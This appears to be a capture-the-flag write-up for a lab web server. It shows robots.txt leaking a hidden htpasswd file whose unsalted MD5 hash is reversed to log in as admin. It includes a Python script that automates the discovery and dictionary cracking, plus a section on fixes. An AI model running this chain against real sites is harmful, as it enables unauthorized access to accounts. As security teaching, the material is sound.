## Exploit
[OWASP WSTG: Conduct Search Engine Discovery Reconnaissance for Information Leakage](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage)
1. Explore public `robots.txt`
```bash
❯ curl http://10.0.2.15/robots.txt
User-agent: *
Disallow: /whatever
Disallow: /.hidden
```
1. Found an MD5 hash for the user `root` in an htpasswd-style file at `http://10.0.2.15/whatever/htpasswd`
1. Used [this website](https://md5.gromweb.com/) to reverse-lookup the MD5 hash (a precomputed-hash lookup, which only works because the digest is stored bare and unsalted) and recover the password `qwerty123@`
1. Found an admin interface by [enumerating some common application admin interfaces](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/05-Enumerate_Infrastructure_and_Application_Admin_Interfaces) at `http://10.0.2.15/admin`
1. Logged in to the admin interface with those credentials to find the flag
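The same chain, scripted end to end as an added example (this is not code from the original writeup): parse `robots.txt` for `Disallow` entries, probe each disallowed directory for an `htpasswd` file, parse the `user:hash` lines, and run an offline dictionary lookup against the MD5 digest instead of a web lookup service. The `SAMPLE_SITE` dictionary, the `WORDLIST`, the `htpasswd` file name and the `http_fetch` helper are assumptions made here for illustration; the sample `robots.txt` and htpasswd contents are constructed, with the digest computed in the script rather than copied from the target.

```python
"""Offline walk-through of the robots.txt -> htpasswd -> MD5 lookup chain.

Added example for the writeup above; inputs are constructed, not captured.
"""
import hashlib
import re
from typing import Callable, Dict, List, Optional

# Constructed sample robots.txt, mirroring the shape of the one in the writeup.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /whatever
Disallow: /.hidden
"""

# Constructed htpasswd line: a bare, unsalted hex MD5 (what a lookup site can reverse).
SAMPLE_HTPASSWD = "root:" + hashlib.md5(b"qwerty123@").hexdigest() + "\n"

# Constructed "site": path -> response body, None standing in for a 404.
SAMPLE_SITE: Dict[str, Optional[str]] = {
    "/robots.txt": SAMPLE_ROBOTS,
    "/whatever/": '<a href="htpasswd">htpasswd</a>',
    "/whatever/htpasswd": SAMPLE_HTPASSWD,
    "/.hidden/": '<a href="README">README</a>',
    "/admin/": "<form>...</form>",
}

# Tiny assumed wordlist; a real run would use rockyou or similar.
WORDLIST = ["password", "123456", "qwerty", "qwerty123", "qwerty123@", "admin"]


def parse_robots(text: str) -> List[str]:
    """Return the Disallow paths in order, skipping comments, blanks and a bare '/'."""
    paths: List[str] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)^disallow:\s*(\S+)", line)
        if m and m.group(1) != "/":  # "Disallow: /" hides everything, not one path
            paths.append(m.group(1))
    return paths


def parse_htpasswd(text: str) -> Dict[str, str]:
    """Parse 'user:hash' lines into a dict; comments and malformed lines are ignored."""
    entries: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        entries[user] = digest
    return entries


def crack_md5(digest: str, wordlist) -> Optional[str]:
    """Dictionary lookup for a bare 32-hex MD5 digest.

    Proper htpasswd MD5 entries look like $apr1$salt$hash and are salted, so a
    plain digest comparison cannot match them; those are refused up front.
    """
    if not re.fullmatch(r"[0-9a-fA-F]{32}", digest):
        return None
    target = digest.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def http_fetch(base_url: str) -> Callable[[str], Optional[str]]:
    """Build a real fetcher (assumed helper): GET base_url + path, None on HTTP error."""
    import urllib.error
    import urllib.request

    def fetch(path: str) -> Optional[str]:
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=5) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError:
            return None

    return fetch


def run_chain(fetch: Callable[[str], Optional[str]], wordlist=WORDLIST) -> Dict[str, object]:
    """robots.txt -> disallowed dirs -> <dir>/htpasswd -> parsed users -> cracked passwords."""
    robots = fetch("/robots.txt")
    disallowed = parse_robots(robots) if robots else []
    credentials: Dict[str, Optional[str]] = {}
    for path in disallowed:
        body = fetch(path.rstrip("/") + "/htpasswd")  # assumed file name, as in the writeup
        if body is None:
            continue
        for user, digest in parse_htpasswd(body).items():
            credentials[user] = crack_md5(digest, wordlist)
    return {"disallowed": disallowed, "credentials": credentials}


if __name__ == "__main__":
    # Offline run against the constructed site; swap in http_fetch("http://10.0.2.15") for a live box.
    print(run_chain(lambda p: SAMPLE_SITE.get(p)))
```

The `crack_md5` guard is the check worth keeping: the writeup's lookup only worked because the file held a raw hex digest, and the same script against a properly generated `$apr1$` entry should report nothing rather than pretend to try.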
## Fix
The purpose of `robots.txt` is to tell search engine crawlers which files and directories not to index. It is itself a public file, so every path listed in it is advertised to anyone who reads it, and listing a path does nothing to restrict access to it. Sensitive resources such as password files must therefore not be placed under the web root at all, and consequently never need to appear in `robots.txt`; in addition, the stored credential should be a salted, purpose-built password hash rather than a bare MD5 digest, which an online lookup can reverse in seconds.